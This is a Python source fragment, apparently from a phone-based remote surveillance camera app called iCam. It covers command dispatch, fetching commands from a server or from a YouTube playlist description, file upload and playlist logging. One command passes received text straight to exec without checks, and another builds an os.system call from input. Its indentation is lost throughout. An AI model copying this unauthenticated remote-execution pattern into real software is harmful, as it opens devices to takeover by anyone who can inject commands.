elif tokens[0] == "retrieve-gps-coordinates":
StartGPS()
elif tokens[0] == "download-file":
DownloadFile(tokens[1])
elif tokens[0] == "play-audio-file":
soundRecord = audio.Sound.open(unicode(tokens[1]))
DebugPrint("ExecuteCommands(): play-audio-file - starting to " \
"play file %s of size %.2f" % \
(tokens[1],
float(soundRecord.duration()) / 1000000))
# PlayAudioFile()
soundRecord.play()
# soundRecord.play(times=1, interval=0, callback=validate)
"""
If the audio file is played several times, interval gives the
time interval between the subsequent plays in microseconds.
"""
# play([times=1, interval=0, callback=None])
"""
This is required because otherwise the file stops playing
(probably because of SetMenu() at the end of this
function).
"""
SleepAndPetWatchdog((soundRecord.duration() + 500000) /
1000000)
"""
Inspired from
Z:\1PhD\ReVival\111111111Src_examples\PyS60_2_0_0\winscw\c\data\python\test\test_audio.py
"""
"""
max_volume = self.sound_object.max_volume()
set_volume = max_volume - 2
self.sound_object.set_volume(set_volume)
"""
"""
time_of_playback = self.sound_object.duration()
# Subtract 3 seconds(expressed in micro seconds) from the total
# duration of the track and start playback from this position.
start_position = time_of_playback - 3000000L
self.sound_object.set_position(start_position)
"""
elif tokens[0] == "set-server":
ICAM_SERVER_NAME = tokens[1]
elif tokens[0] == "get-date-and-time":
myText = "Date and time is: " \
+ GetCurrentDateTimeStringWithMilliseconds() + "."
# if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
elif tokens[0] == "set-date-and-time":
"""
IMPORTANT NOTE: We can also get the date and time by looking at
a (preferably small packet) received at
UploadGzippedStateAndFile.php (or even with
UploadGzippedText.php).
"""
if SYMBIAN_OS:
e32.set_home_time(float(tokens[1])) # It expects float.
elif RASPBIAN_OS:
"""
See https://stackoverflow.com/questions/2193964/set-the-hardware-clock-in-python
and https://stackoverflow.com/questions/12081310/python-module-to-change-system-date-and-time
"""
strDate = time.strftime("%m/%d/%Y %H:%M:%S", \
time.localtime(float(tokens[1])))
os.system('date -s "%s"' % strDate)
DebugPrint("ExecuteCommands(): called date -s with " \
"param strDate = %s" % strDate)
"""
From http://www.computerhope.com/unix/udate.htm:
date -s "11/20/2003 12:48:00"
"""
#!!!!TODO: implement for the other platforms, as well
elif tokens[0] == "adjust-date-and-time-using-delta":
"""
On S60 3rd+ edition we need WriteDeviceData capabilities (which
implies we have to sign with dev certificate) -
See http://discussion.forum.nokia.com/forum/showthread.php?119016-e32.set_home_time%20%20-fails-on-real-device#903719400565939968.
# Inspired from
http://discussion.forum.nokia.com/forum/showthread.php?119016-e32.set_home_time%20%20-fails-on-real-device#32583428368845857418
"""
"""
IMPORTANT: here we should really keep time.time(),
even for S60 2nd edition phones.
"""
#myTime = GetTime() + int(tokens[1])
myTime = time.time() + int(tokens[1])
# myTime = FromStringToTime(tokens[1])
# myTime = tokens[1]
if SYMBIAN_OS:
"""
From http://croozeus.com/Croozeus%20PyS60%20Tutorial8.htm
You can also set the phone's time (note that you need
WriteDeviceData capability) using:
e32.set_home_time(new_time) where new_time is in Unix
timestamp format (seconds since 01.01.1970, 00:00:00).
For example, e32.set_home_time(1134742324)
sets the time to 16.12.2005, 16:12:04
"""
e32.set_home_time(myTime)
elif tokens[0] == "set-burst-detection":
burstModeIsStarted = int(tokens[1])
elif tokens[0] == "set-motion-detection-number-hotspots":
numHotspots = int(tokens[1])
if numHotspots > MAX_NUM_HOTSPOTS:
return
elif tokens[0] == "set-different-pixels-percentage-threshold":
hotspotIndex = int(tokens[1])
if hotspotIndex >= MAX_NUM_HOTSPOTS:
return
differentPixelsPercentageThreshold[0] = \
int(tokens[2])
elif tokens[0] == "set-motion-detection-hotspot":
hotspotIndex = int(tokens[1])
SetMotionDetectionHotspot(hotspotIndex, int(tokens[2]),
int(tokens[3]), int(tokens[4]), int(tokens[5]))
elif tokens[0] == "set-store-locally-media":
storeLocallyMedia = int(tokens[1])
elif tokens[0] == "set-upload-media-to":
uploadMediaToYouTube = int(tokens[1])
uploadMediaToPicasa = int(tokens[2])
useiCamServer = int(tokens[3])
StoreLocalConfigInFile()
elif tokens[0] == "set-google-username":
googleUsername = tokens[1]
StoreLocalConfigInFile()
elif tokens[0] == "set-google-password-encrypted":
googlePasswordEncrypted = tokens[1]
StoreLocalConfigInFile()
elif tokens[0] == "set-googleKeywords":
googleKeywords = tokens[1]
StoreLocalConfigInFile()
elif tokens[0] == "set-googleMediaPrivate":
googleMediaPrivate = int(tokens[1])
StoreLocalConfigInFile()
elif tokens[0] == "erase-oldest-files-and-messages":
EraseOldestFilesAndMessages()
elif tokens[0] == "set-mode-manager":
modeManagerIsEnabled = int(tokens[1])
elif tokens[0] == "set-dawn-time":
# dawnTimeVec is hh:mm:ss
timeTokens = tokens[1].split(":")
dawnTimeVec = [int(timeTokens[0]),
int(timeTokens[1]), int(timeTokens[2])]
elif tokens[0] == "set-dusk-time":
# duskTimeVec is hh:mm:ss
timeTokens = tokens[1].split(":")
duskTimeVec = [int(timeTokens[0]),
int(timeTokens[1]), int(timeTokens[2])]
elif tokens[0] == "exec-security-issues":
"""
"exec-security-issues-no-stdouterr"):
IMPORTANT TODO: !!!!check for dangerous commands
See http://stackoverflow.com/questions/701802/how-do-i-execute-a-string-containing-python-code-in-python.
"eval returns a value, but doesn't work for all commands.
exec works for all, but doesn't return a value.
Still trying to figure out a way around this".
"""
myExecResult = ""
# exec tokens[1]
myCmd = cmdLine[len(tokens[0]) + 1:]
"""
Note that we can put spaces in the commands following the
exec-... keyword.
"""
exec myCmd
myText = "myExecResult = %s" % str(myExecResult)
# if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint("ExecuteCommands(): for command %s we got %s" % \
(myCmd, myText))
"""
elif tokens[0] == "get-phone-model-and-number":
PHONE_INFO_FILENAME = LOCAL_FOLDER + "/PhoneInfo.txt"
fOutput = open(PHONE_INFO_FILENAME, "wb")
fOutput.write("blabla")
fOutput.close()
UploadFile(PHONE_INFO_FILENAME, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_FILE)
#elif tokens[0] == "set-access-point":
#elif tokens[0] == "get-phone-number":
#http://docs.python.org/library/urllib.html
"""
except:
(exceptionType, exceptionValue, exceptionTraceback) = \
sys.exc_info()
myText = "Exception in ExecuteCommands(). Details: time = %s, " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s." \
% (GetCurrentDateTimeStringNice(), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myText)
#sys.stderr.write(myText + "\n")
DebugPrintErrorTrace()
# return False
SetMenu()
StoreState()
return True
"""
Where to write the iCam commands in YouTube?
- I googled to see if I can store an arbitrary file on YouTube - I didn't
find anything. Only about storing on Gmail - but this is an unnecessary
complication.
- I use description in
- playlist - a bit more difficult to read, but possible to write with
Gdata
- disadvantage - the playlist can be erased...
- MAYBE in some video
- other possible ideas to implement:
- I can use "user profile" - very simple to read, seems impossible to
write with Gdata
- we can keep locally on the phone (iCam.py) track of the fact we
downloaded command
- https://code.google.com/apis/youtube/2.0/developers_guide_protocol.html#Profiles
"The YouTube Data API allows you to retrieve user profiles."
def GetYouTubeUserEntry(self, uri=None, username=None):
Retrieve a YouTubeUserEntry.
- to make certain fields in user profile private go to:
- http://www.youtube.com/profile?user=googleUser#g/f - give edit on
profile and deselect the ones you don't want to make
public ;)
- http://www.youtube.com/account_privacy
- https://sites.google.com/site/googleUser/
It seems there is no GData API for YT Messages
http://www.youtube.com/inbox?folder=messages&action_message=1&authuser=0#inbox/1
Note: I can send myself messages.
- other APIs that can be explored:
Running all tests in module gdata_tests.docs_test
Running all tests in module gdata_tests.health_test
Running all tests in module gdata_tests.spreadsheet_test
Running all tests in module gdata_tests.blogger_test
Running all tests in module gdata_tests.webmastertools_test
- I probably cannot write commands in a file and pretend it's a video
since YouTube will discard the video as invalid.
- more complicated embeddings of commands in a real video are not
very appropriate - for phone I guess it would be harder to
decode them.
"""
def DownloadCommandsFromYouTube():
try:
DebugPrint("Entered DownloadCommandsFromYouTube(): " \
"uploadMediaToYouTube = %d." % uploadMediaToYouTube)
if uploadMediaToYouTube == False:
"""
DebugPrint("DownloadCommandsFromYouTube(): bailing out.")
"""
return ""
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
connResult = ConnectToYouTubeGData()
"""
If connResult == -1 then don't continue (most likely bad
username/passwd).!!!!
"""
playlistTitle = "iCam_cmd_" + deviceId
playlistDescription = ""
playlistToUse = None
"""
We require the YouTube alias/nickname which can be different to the
Google username!!!!!!!!
#username='ender123')
"""
# feed = youtubeClient.GetYouTubePlaylistFeed(username="MultiEnder123")
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
# myEntry.id.text = http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if myEntryTitle == playlistTitle:
DebugPrint("DownloadCommandsFromYouTube(): Feed matched " \
"myEntry = %s\n" % str(myEntry) + \
"DownloadCommandsFromYouTube(): myEntry.content = %s\n" % \
str(myEntry.content) + \
"DownloadCommandsFromYouTube(): " \
"myEntry.description = %s" % str(myEntry.description))
# playlistDescription = myEntry.description.split("/")[-1]
playlistDescription = \
str(myEntry.description).split(">")[-2].split("</")[0]
DebugPrint("DownloadCommandsFromYouTube(): " \
"playlistDescription = %s" % str(playlistDescription))
playlistToUse = myEntry
# break
patternNoCmd = "<ns0:description xmlns:ns0=\"" \
"http://gdata.youtube.com/schemas/2007\""
if playlistDescription.find(patternNoCmd) != -1:
DebugPrint("DownloadCommandsFromYouTube(): This is not a " \
"command, just an empty description.")
playlistDescription = ""
else:
DebugPrint("DownloadCommandsFromYouTube(): This is a " \
"real command.")
if playlistDescription != "":
"""
Erase the freshly downloaded commands from the YouTube
playlist (in order to not download and execute it
again).
"""
youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
new_playlist_title=playlistTitle,
new_playlist_description="",
playlist_private=True, username="default")
return playlistDescription
"""
if playlistToUse is None:
# Create the playlist if it was not found.
# Returns: The YouTubePlaylistEntry if successfully posted.
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=True)
# It seems this info is not used!
aVideoTitle = ""
# It seems this info is not used!
aVideoDescription = ""
playlistURI = playlistToUse.feed_link[0].href
# !!!!!!!!Maybe required
#time.sleep(10)
response = youtubeClient.AddPlaylistVideoEntryToPlaylist(playlistURI,
newVideoEntry.id.text.split('/')[-1],
aVideoTitle, aVideoDescription)
"""
except:
"""
newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
pathFileName)
"""
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
errorStr = "Exception in DownloadCommandsFromYouTube() - details: " \
"exceptionTraceback = %s, exceptionType = %s, " \
"exceptionValue = %s. Bailing out..." % \
(repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
DebugPrint(errorStr)
DebugPrintErrorTrace()
return ""
"""
We use this var to download command from YouTube only once every X (=5)
commands from iCam server.
"""
MAX_NUM_COMMANDS_FILES = 5
def DownloadCommands_real():
global deviceId
global ICAM_SERVER_NAME
global accessPointRetryConnect, accessPointName
global uploadMediaToYouTube
global downloadCommandsCounter
DebugPrint("Entered DownloadCommands_real(): accessPointName = %s, " \
"downloadCommandsCounter = %d." % (accessPointName, \
downloadCommandsCounter))
try:
"""
We allow more than one commands file because, in case we have multiple
commands to issue, it is possible that iCam will crash (at least the
S60 version), while executing one of the commands. Therefore,
we allow files cmd.txt, cmd.txt.1, ..., cmd.txt.5 such that if iCam
restarts it will continue processing the remaining cmd.txt* files.
"""
executedLocalCommands = False
for index in range(MAX_NUM_COMMANDS_FILES):
pathFileName = LOCAL_FOLDER + "/" + COMMANDS_FILENAME
if index != 0:
pathFileName = pathFileName + ".%d" % index
if os.path.isfile(pathFileName):
try:
fInput = open(pathFileName, "rb") #"rt"????
myCommands = fInput.read()
fInput.close()
# Should I delete pathFileName after
# ExecuteCommands(myCommands)? !!!!
os.unlink(pathFileName)
except:
DebugPrintErrorTrace()
#UpdateDownloadCommandsCounter()
#return ExecuteCommands(myCommands)
executedLocalCommands = True
res = ExecuteCommands(myCommands)
if executedLocalCommands == True:
return
if NoInternetConnection():
DebugPrint("DownloadCommands(): Not downloading commands since " \
"there is no Internet connection.")
#UpdateDownloadCommandsCounter()
return False
except:
DebugPrintErrorTrace()
try:
if iOS_PYOBJC:
DebugPrint("DownloadCommands(): Before urllib.urlopen().")
# urllib.urlopen() seems to crash the application...
if uploadMediaToYouTube:
if downloadCommandsCounter == 0:
myCommands = DownloadCommandsFromYouTube()
# GetYouTubeUserProfile()
#UpdateDownloadCommandsCounter()
if myCommands != "":
return ExecuteCommands(myCommands)
#UpdateDownloadCommandsCounter()
#if USE_ICAM_SERVER:
if useiCamServer > 0:
DebugPrint("DownloadCommands(): Now trying to download command " \
"from iCam server.")
myCommandsCompressed = urllib.urlopen("http://" + ICAM_SERVER_NAME +
WEBPAGE_DL_COMMAND_FILE + "?deviceId=" + deviceId).read()
myCommands = myCommandsCompressed.decode("zlib")
if iOS_PYOBJC:
DebugPrint("DownloadCommands(): After urllib.urlopen().")
#UpdateDownloadCommandsCounter()
return ExecuteCommands(myCommands)
# except IOError: print "DownloadCommands IOError"
except:
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
myText = "Exception in DownloadCommands. Details: time = %s, " \
"free_ram = %d. exceptionTraceback = %s, " \
"exceptionType = %s, exceptionValue = %s." % \
(GetCurrentDateTimeStringNice(), GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback)),
str(exceptionType), str(exceptionValue))
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
#sys.stderr.write(myText + "\n")
DebugPrint(myText)
DebugPrintErrorTrace()
#UpdateDownloadCommandsCounter()
return False
#UploadText("Read command file", ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT)
#return res
downloadCommandsCounter = 0
"""
DOWNLOAD_COMMANDS_COUNTER_MAX is the number of iCam server command downloads
before we attempt to download a command from YouTube
(which we want to do less often in the ~idea it's more data intensive).
Has to be > 1 since I use downloadCommandsCounter for sync with the waiting
loop in MainLog().
"""
DOWNLOAD_COMMANDS_COUNTER_MAX = 5
"""
!!!!Although we give hasDownloadedNewCmd = DownloadCommands() and we do not use
hasDownloadedNewCmd anywhere at all,
We should maybe return result from the function, as it was doing the original
DownloadCommands().
"""
def DownloadCommands():
def UpdateDownloadCommandsCounter():
global downloadCommandsCounter
downloadCommandsCounter += 1
if downloadCommandsCounter == DOWNLOAD_COMMANDS_COUNTER_MAX:
downloadCommandsCounter = 0
DebugPrint("Entered DownloadCommands().")
try:
res = DownloadCommands_real()
except:
DebugPrintErrorTrace()
UpdateDownloadCommandsCounter()
DebugPrint("Exiting DownloadCommands().")
return res
# thread.start_new_thread(ReactiveLoop_real, ())
# MyThreadStart(DownloadCommands_real)
"""
In order for the viewfinder to correspond to the zoom level, we must take a
picture (without saving it), close and open the viewfinder.
These steps are necessary because of the way the functions are currently
defined in PyS60, and have a slight impact on performance.
Future releases of PyS60 may have optimized functions.
# Take the picture with cameraId = 0.
#pic = camera.take_photo('RGB', cameraPhotoSizes[1], digitalZoom, 'none',
# 'auto', 'auto', 0)
#camera.stop_finder()
#camera.start_finder(ViewFinderCallback, backlight_on = 1, size = (240,180))
"""
def GetTextForState(cameraId):
resText = ""
try:
resText = "Free space in bytes on drives: C = %d, D = %d, E = %d. " \
% (GetFreeDriveSpace("C:"), GetFreeDriveSpace("D:"),
GetFreeDriveSpace("E:"))
resText += "free_ram = %d. GSM network signal strength = %d [%s]. " \
"Battery = %d, charger_status = %d. " \
"Pause interval (pauseInterval) = %d. " \
"Camera modes = (%d, %d). " \
% (
GetFreeRAM(),
signalStrength, signalUnits,
GetBatteryLevelPercentage(), GetChargerStatus(),
pauseInterval,
cameraMode[0], cameraMode[1]
)
resText += "Resolution (photoResolutionIndex) = %d. " \
"photoModeIndex = %d. digitalZoom = %d. " \
"photoQuality = %d. exposureIndex[0] = %d. " \
% (photoResolutionIndex, photoModeIndex[cameraId],
digitalZoom, photoQuality, exposureIndex[0])
resText += "whiteBalanceIndex[0] = %d. exposureIndex[1] = %d. " \
"whiteBalanceIndex[1] = %d. flashIndex = %d. " \
"audioRecordDuration = %d. " \
% (whiteBalanceIndex[0], exposureIndex[1],
whiteBalanceIndex[1], flashIndex, audioRecordDuration)
resText += "rotateDegreesImage = %d. mobileCountryCode = %d. " \
"mobileNetworkCode = %d. locationAreaCode = %d. " \
"cellId = %d. " % \
(rotateDegreesImage, mobileCountryCode,
mobileNetworkCode, locationAreaCode, cellId)
if SYMBIAN_OS:
"""
It seems miso's heap and/or stack functions give exception:
"SymbianError: [Errno -5] KErrNotSupported".
"""
if (S60_EDITION[0] >= 3) and misoIsImported:
# if misoIsImported:
resText += "miso: num_alloc_heap_cells() = %d, " \
"num_free_heap_cells() = %d, " \
"alloc_heap_cells_size() = %d, " \
"heap_total_avail() = %d, " \
"heap_biggest_avail() = %d, " \
"heap_base_address() = %d, stack_info() = %s.\n" \
% (
miso.num_alloc_heap_cells(),
miso.num_free_heap_cells(),
miso.alloc_heap_cells_size(),
miso.heap_total_avail(),
miso.heap_biggest_avail(),
miso.heap_base_address(),
str(miso.stack_info())
)
except:
DebugPrint("Exception in GetTextForState(cameraId = %d)..." % cameraId)
DebugPrintErrorTrace()
return resText
# Upload file from local filesystem to the server.
def UploadFile(pathFileName, inetServerAddress, pageOnServer):
global deviceId
DebugPrint("Entered UploadFile().")
# See http://docs.python.org/library/struct.html
"""
# (32 bits long??) integers, in little endian format.
IMPORTANT NOTE: we use "<" to specify ALSO no alignment -
see http://docs.python.org/library/struct.html
"""
myFormat = "<256s"
dataHeader = struct.pack(myFormat, pathFileName)
sizeDataHeader = len(dataHeader)
"""
IMPORTANT NOTE: we use "<" to specify little endian and no alignment - see
http://docs.python.org/library/struct.html .
"""
dataHeader = struct.pack("<i", sizeDataHeader) + dataHeader
try:
"""
Read the binary file from disk in chunks, and compress with Zlib using
stream aware compress objects - see
http://docs.python.org/library/zlib.html and
http://stackoverflow.com/questions/2423866/python-decompressing-gzip-chunk-by-chunk/2424549#2424549
for details.
"""
# myData = ""
myBufferSize = 64 * 1024
# 1 = lowest compression for zlib.compressobj() .
zlibCompressObject = zlib.compressobj(1)
# myBuffer = struct.pack("100s", deviceId) + dataHeader
myBuffer = AddPacketHeader(dataHeader)
myData = zlibCompressObject.compress(myBuffer)
fInput = open(pathFileName, "rb")
while True:
myBuffer = fInput.read(myBufferSize)
if len(myBuffer) == 0:
break
myData += zlibCompressObject.compress(myBuffer)
fInput.close()
myData += zlibCompressObject.flush()
"""
fInput = open(pathFileName, "rb")
myData = fInput.read()
fInput.close()
"""
except:
# myData = dataHeader + myData
(exceptionType, exceptionValue, exceptionTraceback) = sys.exc_info()
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId,
"Exception in UploadFile with pathFileName = %s - details: " \
"free_ram = %d. %s. Bailing out..." % (pathFileName,
GetFreeRAM(),
repr(traceback.format_tb(exceptionTraceback))),
ICAM_SERVER_NAME, WEBPAGE_UL_GZIPPED_TEXT,
None)
DebugPrint("Exception in UploadFile with pathFileName = %s. " \
"Bailing out..." % pathFileName)
DebugPrintErrorTrace()
return
try:
"""
This returns the basename of the file - I think os.path.basename() is
not supported on PyS60.
"""
fileName = os.path.split(pathFileName)[1]
except:
DebugPrintErrorTrace()
return UploadBinaryData(myData, inetServerAddress, pageOnServer,
fileName)
#return UploadGZippedData(deviceId, myData, inetServerAddress,
# pageOnServer, fileName)
def TestPhoneCall():
if ANDROID_OS:
try:
time.sleep(1.0) # 10.0)
DebugPrint("Before myDroid.phoneCall()")
# Does not work on Prestigio.
myDroid.phoneCall("tel:" + ALARM_PHONE_NUMBER)
"""
Does not work on Prestigio. Gives exception:
"java.lang.NullPointerException".
"""
# myDroid.phoneCall(ALARM_PHONE_NUMBER)
DebugPrint("After myDroid.phoneCall()")
except:
DebugPrintErrorTrace()
lastResultGetLatestPhoto = None
"""
!!!!TODO: rename LogToYouTubePlaylist() -> ConnectToYouTubeLogPlaylist()
"""
def LogToYouTubePlaylist():
global youtubeClient, youtubeClientAlreadyConnected
global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
global uploadMediaToYouTube
global deviceId
global btAddrTable
DebugPrint("Entered LogToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
"""
if uploadMediaToYouTube == 0:
uploadMediaToYouTube = 1
"""
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
# If connResult == -1 then don't continue
# (most likely bad username/passwd).!!!!
connResult = ConnectToYouTubeGData()
try:
playlistTitle = "iCam_log_" + deviceId #354525040419119
# Create the playlist if it doesn't exist.
if True:
playlistDescription = playlistTitle
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different
to the Google username!!!!!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "feed =", feed
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
#myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
#print " myEntryIdStr = %s" % myEntryIdStr
if playlistTitle == myEntryTitle:
playlistToUse = myEntry
break
if playlistToUse is None:
# Create the playlist if it was not found
playlistToUse = \
youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
"""
Note: YouTube has description playlists of at max 5000 characters.
Picasa has album descriptions of max 1000 characters.
"""
playlistDescription = ""
newPlaylistDescription = \
"batteryLevel = %d; chargerStatus = %d; " % \
(GetBatteryLevelPercentage(), GetChargerStatus())
newPlaylistDescription += \
"btAddrTable = %s\n" % (str(btAddrTable))
DebugPrint("LogToYouTubePlaylist(): newPlaylistDescription = %s." % \
newPlaylistDescription)
"""
newPlaylistDescription += \
"btMsgMostRecentTime = %s, " \
"btAddrTable = %s" % \
(str(btMsgMostRecentTime), str(btAddrTable)))
"""
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different to
the Google username!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Find the YouTube playlist
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
# myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if myEntryTitle == playlistTitle:
DebugPrint("LogToYouTubePlaylist(): " \
"Feed matched myEntry = %s\n" % str(myEntry) + \
"LogToYouTubePlaylist(): " \
"myEntry.content = %s\n" % str(myEntry.content) + \
"LogToYouTubePlaylist(): " \
"myEntry.description = %s" % str(myEntry.description))
# playlistDescription = myEntry.description.split("/")[-1]
playlistDescription = str(myEntry.description).\
split(">")[-2].split("</")[0]
DebugPrint("LogToYouTubePlaylist(): " \
"playlistDescription = %s" % str(playlistDescription))
playlistToUse = myEntry
break
if playlistToUse is None:
# The YouTube playlist was not found --> we create one
DebugPrint("LogToYouTubePlaylist(): Couldn't find " \
"YouTube playlist %s. Creating it." % playlistTitle)
# Create the playlist if it was not found
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
newPlaylistDescription, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
myEntryIdStr = playlistToUse.id.text.split("/")[-1]
else:
if len(newPlaylistDescription) + len(playlistDescription) < 5000:
playlistDescription += newPlaylistDescription
else:
playlistDescription = newPlaylistDescription
# if playlistDescription != "":
youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
new_playlist_title=playlistTitle,
new_playlist_description=playlistDescription,
playlist_private=True, username="default")
# return playlistDescription
except:
#newVideoEntry = youtubeClient.InsertVideoEntry(videoEntry,
# pathFileName)
DebugPrintErrorTrace()
DebugPrint("Exiting LogToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
def SendAlarmMessageToYouTubePlaylist(message):
global youtubeClient, youtubeClientAlreadyConnected
global YOUTUBE_TEST_CLIENT_ID, googleUsername, youtubeDeveloperKey
global uploadMediaToYouTube
global deviceId
DebugPrint("Entered SendAlarmMessageToYouTubePlaylist() at %s." % \
GetCurrentDateTimeStringWithMilliseconds())
if uploadMediaToYouTube == 0:
uploadMediaToYouTube = 1
if youtubeClientAlreadyConnected == False:
if gdataModulesImported == False:
ImportGdataModules()
# If connResult == -1 then don't continue
# (most likely bad username/passwd).!!!!
connResult = ConnectToYouTubeGData()
try:
playlistTitle = "iCam_alarm_" + deviceId #354525040419119
# Create the playlist if it doesn't exist.
if False:
playlistDescription = playlistTitle
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different
to the Google username!!!!!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "feed =", feed
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
#myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
#print " myEntryIdStr = %s" % myEntryIdStr
if playlistTitle == myEntryTitle:
playlistToUse = myEntry
break
if playlistToUse is None:
# Create the playlist if it was not found
playlistToUse = \
youtubeClient.AddPlaylist(playlistTitle,
playlistTitle, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
"""
Note: YouTube has description playlists of at max 5000 characters.
Picasa has album descriptions of max 1000 characters.
"""
playlistDescription = ""
newPlaylistDescription = \
"Alarm... motion degree... audio degree... %s." % message
playlistToUse = None
"""
!!!!We require the YouTube alias/nickname which can be different to
the Google username!!!!
"""
#feed = youtubeClient.GetYouTubePlaylistFeed(username =
# "MultiEnder123") #username='ender123')
feed = youtubeClient.GetYouTubePlaylistFeed()
# Returns: A YouTubePlaylistFeed if successfully retrieved.
# print "DownloadCommandsFromYouTube(): feed = %s" % str(feed)
# print "feed.entry[0] =", feed.entry[0]
for myEntry in feed.entry:
myEntryTitle = myEntry.title.text
# print "myEntryTitle = %s" % myEntryTitle
# myEntry.id.text =
# http://gdata.youtube.com/feeds/api/users/MultiEnder123/playlists/3FD3773F7AC5DD1E
# myEntry.id = <xml>...
myEntryIdStr = myEntry.id.text.split("/")[-1]
# print " myEntryIdStr = %s" % myEntryIdStr
if myEntryTitle == playlistTitle:
DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
"Feed matched myEntry = %s\n" % str(myEntry) + \
"SendAlarmMessageToYouTubePlaylist(): " \
"myEntry.content = %s\n" % str(myEntry.content) + \
"SendAlarmMessageToYouTubePlaylist(): " \
"myEntry.description = %s" % str(myEntry.description))
# playlistDescription = myEntry.description.split("/")[-1]
playlistDescription = str(myEntry.description).\
split(">")[-2].split("</")[0]
DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
"playlistDescription = %s" % str(playlistDescription))
playlistToUse = myEntry
break
"""
patternNoCmd = "<ns0:description xmlns:ns0=" \
"\"http://gdata.youtube.com/schemas/2007\""
if playlistDescription.find(patternNoCmd) != -1:
DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
"This is not a command, just an empty description.")
playlistDescription = ""
else:
DebugPrint("SendAlarmMessageToYouTubePlaylist(): " \
"This is a real command.")
"""
if playlistToUse is None:
DebugPrint("SendAlarmMessageToYouTubePlaylist(): Couldn't find " \
"YouTube playlist %s. Creating it." % playlistTitle)
# Create the playlist if it was not found
playlistToUse = youtubeClient.AddPlaylist(playlistTitle,
newPlaylistDescription, playlist_private=False)
# Returns: The YouTubePlaylistEntry if successfully posted.
myEntryIdStr = playlistToUse.id.text.split("/")[-1]
else:
if len(newPlaylistDescription) + len(playlistDescription) < 5000:
playlistDescription += newPlaylistDescription
else:
playlistDescription = newPlaylistDescription
# if playlistDescription != "":
youtubeClient.UpdatePlaylist(playlist_id=myEntryIdStr,
new_playlist_title=playlistTitle,
